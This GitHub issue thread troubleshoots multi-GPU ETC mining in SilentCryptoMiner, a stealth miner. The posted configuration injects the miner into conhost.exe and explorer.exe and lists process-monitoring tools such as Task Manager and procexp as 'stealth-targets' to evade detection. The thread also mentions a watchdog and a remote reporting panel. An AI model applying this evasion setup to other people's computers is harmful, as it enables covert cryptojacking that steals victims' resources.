### ISSUE TITLE
Mining with multi-GPU don't works

### ISSUE THREAD

**Issue by TheKurtix** [UnamSanctam/SilentCryptoMiner#962]
Hello, I did the test on my mining platform which has 4 GPUs, but the ETC mining does not start

![true](https://user-images.githubusercontent.com/104946731/181604779-62b96fd3-77b0-44db-96c6-106c3598ae96.JPG)

**Comment by UnamSanctam** [comment]
Check your GPUs with MSI Afterburner if you aren't already, I can mine with both my RTX 2070 and GTX 970 at the same time.

**Comment by TheKurtix** [comment]
I disabled idle mining for GPU, XMR mining works perfectly well but not with GPUs for ETC
When I check directly via MSI Afterburner, no trace of activity, same on the 2miners mining pool

I chose two different injections for XMR and ETC
conhost.exe for XMR and explorer.exe for ETC

JSON : {
    "url": "stratums://`0xa747bbfef726bd52853fc32ccd9b6a18d166fac5`.{COMPUTERNAME}@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 0,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": ""
}

**Comment by UnamSanctam** [comment]
And you're sure that no "stealth-targets" programs are running? You can set up a local web panel for testing to see what it's doing https://github.com/UnamSanctam/UnamWebPanel#for-local-testing.

**Comment by TheKurtix** [comment]
![down](https://user-images.githubusercontent.com/104946731/181611826-f1887f3f-3460-429a-86ee-c66e7c217a01.JPG)

**Comment by UnamSanctam** [comment]
Did you enter `http://localhost/api/endpoint.php` into "API Endpoint URL" when building the miner?

**Comment by TheKurtix** [comment]
![final](https://user-images.githubusercontent.com/104946731/181625383-daa1b4f0-6a29-4ab2-a74f-ba30bcf3dc6f.JPG)

**Comment by UnamSanctam** [comment]
Can you press the '+' before the ID and post all the information? If it always says "Starting" no matter how much time goes by then most likely you cannot connect to the pool (for example your IP could be blocked by the pool or your ISP could have 2miners servers blocked) which causes it to eventually close after trying to connect enough and then it restarts due to the watchdog starting it (hence why it's "Starting"), try another pool and see if you can connect.

**Comment by TheKurtix** [comment]
I use Gminer and i have no problem for connect to the pool etc.2miners.com:11010
I try with ethermine, i have a some problème
I use Google DNS could that be a problem ?

Pool etc.2miners.com
Port 11010
Utilisateur 0xa747bbfef726bd52853fc32ccd9b6a18d166fac5
Travailleur CRIGMEDIASE
Mot de passe X
Nom d’utilisateur Système
Nom de l’ordinateur RIG-MEDIA-SERVE
Type ethminer
Version 2.5.0
GPU NVIDIA GeForce RTX 3060 Ti, AMD Radeon(TM) Vega 3 Graphics, NVIDIA GeForce RTX 3060 Ti, NVIDIA GeForce RTX 3060 Ti, NVIDIA GeForce RTX 3080
CPU AMD Athlon 3000G with Radeon Vega Graphics
Active Window Running as System
Run Time 3 minutes
Distant URL
Dernière connexion 2022-07-28 21:54:12
First Connection 2022-07-28 19:51:13
Configuration 
Default ethminer
Actions

**Comment by TheKurtix** [comment]
![78](https://user-images.githubusercontent.com/104946731/181627093-8b60a050-47d1-4912-9eeb-f20f460d5486.JPG)

Status : Actif

**Comment by UnamSanctam** [comment]
Alright, can you open MSI Afterburner and take a screenshot of the GPU VRAM and GPU Usage fields?

**Comment by TheKurtix** [comment]
![vram](https://user-images.githubusercontent.com/104946731/181628434-933f42cf-5186-4042-b7cd-4f6310767dad.JPG)

I check pool and don't have one share

**Comment by UnamSanctam** [comment]
Hmm, it should work fine, here is someone I was helping to optimize their mining hashrate a few days ago and they have multiple RTX 3000 series GPUs:
<img src="https://user-images.githubusercontent.com/10323655/181632571-c2ebfbdd-9140-48fd-8986-b8962455d05b.png">

Can you try extracting this .zip and running the .bat file: [Normal Miner Test.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/9214360/Normal.Miner.Test.zip) to see if it works?

**Comment by TheKurtix** [comment]
![fail](https://user-images.githubusercontent.com/104946731/181644541-1fe91e65-c0dc-48a4-8d8b-31d7db6d31f3.jpg)

**Comment by UnamSanctam** [comment]
Yes looks like you cannot connect to the pool then.

**Comment by TheKurtix** [comment]
I edited the bat changing pool and it works

@echo off
ethminer --pool=stratums://0xd513e80ECc106A1BA7Fa15F1C590Ef3c4cd16CF3@etc-eu1.nanopool.org:19433 --cinit-algo="etchash" --cinit-max-gpu=50 --cinit-idle-wait=1 --cinit-idle-gpu=80
pause

**Comment by UnamSanctam** [comment]
Yes, since it's your connection to the 2miners ETC pool server that is getting denied then using another pool would work.

**Comment by TheKurtix** [comment]
![error](https://user-images.githubusercontent.com/104946731/181646962-9a19db22-39e3-4137-ad23-351bebd5645a.JPG)

Oops...not really fix

**Comment by UnamSanctam** [comment]
It's about your integrated GPU in your CPU not having enough VRAM, but that shouldn't cause it to exit (and doesn't in the silent miner) so it's most likely something else.

**Comment by TheKurtix** [comment]
Hi, i don't understand why with gminer 2miners pool adress it's works and on ethminer say : access deny/access refused

**Comment by UnamSanctam** [comment]
Could possibly be your firewall or something, or 2miners checks something else when your IP connects (maybe user agent). It connects fine for me so it's either something with your computer or specific connection from your IP, do you have a VPN you can test with?
